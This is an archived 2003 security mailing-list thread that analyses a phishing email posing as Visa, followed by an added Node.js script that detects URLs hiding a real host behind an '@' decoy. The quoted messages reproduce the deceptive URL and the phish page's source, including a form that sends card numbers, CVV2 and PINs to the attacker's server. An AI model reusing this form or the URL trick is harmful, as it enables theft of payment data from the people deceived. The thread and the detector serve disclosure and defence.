lists.openwall.net: Open Source and information security mailing list archives
 
From: joshua.knarr at sap.com (Knarr, Joshua)
Subject: visa XSS?

My bad; it was just pointed out to me that redirection with @ and with %01@ are different things.  I don't mean to take shots at the X-Force guys.

Thanks guys.

>-----Original Message-----
>From: full-disclosure-admin@...ts.netsys.com 
>[mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of Gary Flynn
>Sent: Tuesday, December 23, 2003 9:30 AM
>To: Mauro Flores
>Cc: full-disclosure@...ts.netsys.com
>Subject: Re: [Full-Disclosure] visa XSS?
>
>
>
>Mauro Flores wrote:
>
>> I received this mail today, the funny stuff is that when you click on the
>> link, you execute:
>>
>> http://www.visa.com:UserSession=2f6q9uuu88312264trzzz55884495&useroption=SecurityUpdate&StateLevel=GetFrom@...21.80.2/~gotier/verified_by_visa.htm
>>
>> I don't have a Visa card and I don't like that 64.21.80.2 which is not a
>> Visa IP, AFAIK.
>> Anyone else receive it??
>
>Yeah. We just got one here. I missed the first part of this thread
>so I don't know if I'm repeating stuff.
>
>The original email came from an address registered in Korea.
>
>Although the present web site redirects to the VISA site, if you look at
>the source you'll find:
>
><HTML><HEAD>
><TITLE>Secure with Visa</TITLE>
><META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
><meta http-equiv='refresh' content='0; url=http://www.usa.visa.com/personal/privacy_policy/?it=ft_/personal/secure_with_visa/index.html'>
><BODY>
>	<script language="JavaScript">
><!--
>
>
>//	alert("popali");
>	window.name="spec";
>	window.open("http://64.21.80.2/~gotier/r.php", 'Visa', "resizable=no,scrollbars=no,width=425,height=198");
>//	window.focus();
>//-->
></script>
></BODY></HTML>
>
>And that r.php is a phish:
>
>Please, enter your data info!<html>
><head>
><title>Enter your data</title>
></head>
><body>
><br>
><form method=post action=http://64.21.80.2/~gotier/r.php>
>Credit Card No. <input type=text name=cc value=''><br>
>CVV2 <input type=text name=cvv2 value=''><br>
>PIN-ATM CODE: <input type=text name=pin value=''><br>
>Expiration Date: month : <select name=month>
><option value=01>01
><option value=02>02
><option value=03>03
><option value=04>04
><option value=05>05
><option value=06>06
><option value=07>07
><option value=08>08
><option value=09>09
><option value=10>10
><option value=11>11
><option value=12>12
></select> year : <select name=year>
><option value=2003>2003
><option value=2004>2004
><option value=2005>2005
><option value=2006>2006
><option value=2007>2007
><option value=2008>2008
><option value=2009>2009
><option value=2010>2010
><option value=2011>2011
><option value=2012>2012
></select>
><br><br>
><input type=submit value='Send');
></form>
></body>
></html>
>
>-- 
>Gary Flynn
>Security Engineer - Technical Services
>James Madison University
>
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.netsys.com/full-disclosure-charter.html
>
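
The thread turns on the userinfo "@" trick: everything before the last "@" in a URL's authority is parsed as username and password, so the link in the mail actually fetches from 64.21.80.2 and the www.visa.com part is decoration. The %01@ form Joshua distinguishes from the plain @ form went one step further in Internet Explorer of the time, which stopped displaying the address at the control byte, so the address bar showed only the decoy. The following is an added example, not code from the thread or from anyone quoted in it. It runs constructed sample URLs patterned on the one in the mail through the WHATWG URL parser that Node and browsers share, reports the host a browser would really connect to, and flags the decoy. analyzeUrl, rawUserinfo, report and the SAMPLES list are this example's own names; 64.21.80.2 is the address the thread itself names for the phish server.

```javascript
// Added example, not code from the thread: classify a URL for the
// "decoy-host@real-host" trick used by the Visa phish.  Uses the WHATWG URL
// parser (global URL in Node and browsers), so the host it reports is the
// one a modern browser would actually connect to.

// Constructed samples patterned on the thread's URL.  64.21.80.2 is the
// phish server named in the thread; the rest is illustrative.
const SAMPLES = [
  'http://www.visa.com:UserSession=2f6q9uuu88312264trzzz55884495&useroption=SecurityUpdate&StateLevel=GetFrom@64.21.80.2/~gotier/verified_by_visa.htm',
  'http://www.visa.com%01@64.21.80.2/~gotier/verified_by_visa.htm',
  'https://www.usa.visa.com/personal/privacy_policy/',
  'ftp://anonymous:guest@ftp.example.org/pub/',
];

function rawUserinfo(raw) {
  // Text between "scheme://" and the last "@" of the authority, read from the
  // raw string because the parser percent-encodes control bytes before
  // exposing them as .username / .password.
  const start = raw.indexOf('//');
  if (start === -1) return '';
  const rest = raw.slice(start + 2);
  const end = rest.search(/[/?#]/);
  const authority = end === -1 ? rest : rest.slice(0, end);
  const at = authority.lastIndexOf('@');
  return at === -1 ? '' : authority.slice(0, at);
}

function analyzeUrl(raw) {
  let u;
  try {
    u = new URL(raw);
  } catch (err) {
    return { raw, parses: false };
  }
  const userinfo = rawUserinfo(raw);
  const hasUserinfo = u.username !== '' || u.password !== '';
  // A C0 control byte in the userinfo, literal or as %00-%1F: the IE
  // address-bar truncation trick (the %01@ variant from the thread).
  const hasControlChar = /[\x00-\x1f]/.test(userinfo) || /%[01][0-9a-f]/i.test(userinfo);
  // A "username" shaped like a hostname is the bait the victim is meant to read.
  const decoyLooksLikeHost = /^[a-z0-9-]+(\.[a-z0-9-]+)+$/i.test(u.username);
  return {
    raw,
    parses: true,
    realHost: u.hostname,   // where the browser really connects
    decoy: u.username,      // what the victim sees at the start of the URL
    hasUserinfo,
    hasControlChar,
    suspicious: hasUserinfo && (decoyLooksLikeHost || hasControlChar),
  };
}

function report(urls = SAMPLES) {
  return urls.map(analyzeUrl);
}

for (const entry of report()) {
  console.log(entry.suspicious ? 'PHISH?' : 'ok    ', entry.realHost, '<- decoy:', JSON.stringify(entry.decoy));
}
```

Run it with node. The check reads the raw authority text as well as the parsed object on purpose: the parser percent-encodes a literal control byte before .username is available, so a test on the parsed field alone would miss the unencoded form of the %01 trick. Plain credentials in a URL (the ftp sample) carry userinfo but no hostname-shaped decoy and are not flagged.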

